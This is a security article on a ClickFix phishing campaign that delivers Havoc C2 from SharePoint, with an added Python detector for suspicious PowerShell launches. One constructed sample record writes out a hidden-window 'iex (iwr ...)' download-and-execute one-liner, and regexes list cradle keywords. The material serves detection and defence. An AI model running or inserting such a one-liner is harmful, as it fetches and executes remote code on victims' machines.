
New ClickFix Phishing Modality Uses Social Engineering to Trick Victims into Running Malicious Code

FortiGuard researchers have discovered that the attack uses Microsoft SharePoint to distribute the malicious code. Below is a list of the most common methods used to distribute the malicious code.
ClickFix is a tactic in which attackers build websites or attachments that display fake errors and urge users to click a “Fix” button. In the new campaign, the attackers send phishing emails with a “limited notification” message that supposedly must be viewed through an attached HTML file. When opened, the file displays a fake error 0x8004de86 claiming that OneDrive cannot be connected. The victim is told to refresh the DNS cache manually, which requires copying and running a PowerShell command.
This command downloads a script from the attacker's SharePoint server. If the device is running in an analysis environment (such as a sandbox), the script exits. Otherwise, it modifies the Windows registry, checks for Python and installs it if necessary. Next, a further script is downloaded that injects the Havoc C2 payload as a DLL.
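The chain above has a distinctive shape from a defender's side: PowerShell started by the user from the Run dialog (child of explorer.exe), a decoy "flush DNS" command kept in the pasted one-liner so the console looks legitimate, and a download-and-execute cradle that fetches the next stage from a sharepoint.com URL. The following detector is an added example, not FortiGuard's or the article's code. It scores process-creation records (field names are simplified and assumed, modelled loosely on Sysmon Event ID 1 / Security 4688) and flags the combination rather than any single indicator, so that an administrator's genuine `ipconfig /flushdns` or a scheduled SharePoint download does not trip it. All three sample records and the tenant names in them are constructed.

```python
"""Heuristic detector for ClickFix-style PowerShell launches.

Added example (not the article's or FortiGuard's code). Field names on the
event record are assumed/simplified; thresholds are illustrative.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str   # image path of the parent process
    image: str          # image path of the created process
    command_line: str   # full command line as logged


# The lure tells the victim to "refresh the DNS cache"; the pasted one-liner
# keeps that decoy so its console output looks like the promised fix.
DECOY_FIX = re.compile(r"ipconfig\s+/flushdns", re.I)
# Download-and-execute cradles commonly seen in pasted PowerShell one-liners.
CRADLE = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|invoke-webrequest|\biwr\b"
    r"|\bcurl\b|start-bitstransfer)", re.I)
# Next stage staged on a trusted Microsoft domain (article: attacker's SharePoint).
SHAREPOINT_URL = re.compile(r"https?://[\w.-]*\.sharepoint\.com", re.I)
# Commands pasted into Win+R / the Run dialog are spawned by explorer.exe.
RUN_DIALOG_PARENT = "explorer.exe"
# Pasted one-liners often hide their window so the victim sees nothing.
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)


def score_event(ev):
    """Return (score, reasons): one point per ClickFix indicator present."""
    reasons = []
    img = ev.image.lower()
    if not (img.endswith("powershell.exe") or img.endswith("pwsh.exe")):
        return 0, reasons
    cl = ev.command_line
    if CRADLE.search(cl):
        reasons.append("download/execute cradle")
    if SHAREPOINT_URL.search(cl):
        reasons.append("payload hosted on sharepoint.com")
    if DECOY_FIX.search(cl):
        reasons.append("decoy 'flush DNS' command")
    if ev.parent_image.lower().endswith(RUN_DIALOG_PARENT):
        reasons.append("launched from Run dialog (parent explorer.exe)")
    if HIDDEN_WINDOW.search(cl):
        reasons.append("hidden window")
    return len(reasons), reasons


def triage(events, threshold=3):
    """Return (index, score, reasons) for events that look like a ClickFix launch.

    A cradle must be present; the threshold keeps lone admin commands and
    ordinary SharePoint downloads below the alerting line.
    """
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold and any("cradle" in r for r in reasons):
            hits.append((i, score, reasons))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    # 0: an administrator really flushing the DNS cache from a console
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -Command "ipconfig /flushdns"'),
    # 1: a scheduled task pulling a report from the company's SharePoint
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -NoProfile -Command "Invoke-WebRequest '
                 r'https://contoso.sharepoint.com/sites/it/report.csv -OutFile C:\reports\report.csv"'),
    # 2: the ClickFix pattern: Run dialog, decoy, hidden window, cradle, SharePoint
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell -w hidden -c "ipconfig /flushdns; '
                 r"iex (iwr 'https://constructed-tenant.sharepoint.com/:u:/s/x/stage.txt')\""),
]


if __name__ == "__main__":
    for idx, score, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score {score}: {', '.join(reasons)}")
```

Run against the samples, only record 2 is reported (score 5); the admin command scores 1 and the scheduled download 2. In production the same scoring would sit on top of PowerShell script-block logging or EDR process telemetry, and the sharepoint.com check would be extended to whatever file-sharing domains the organisation trusts, since the point of this campaign is that the hosting domain itself looks benign.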
ClickFix is a growing threat that uses social engineering to infect devices. Users are advised to be cautious, not to execute commands from suspicious sources, and to verify the authenticity of error messages.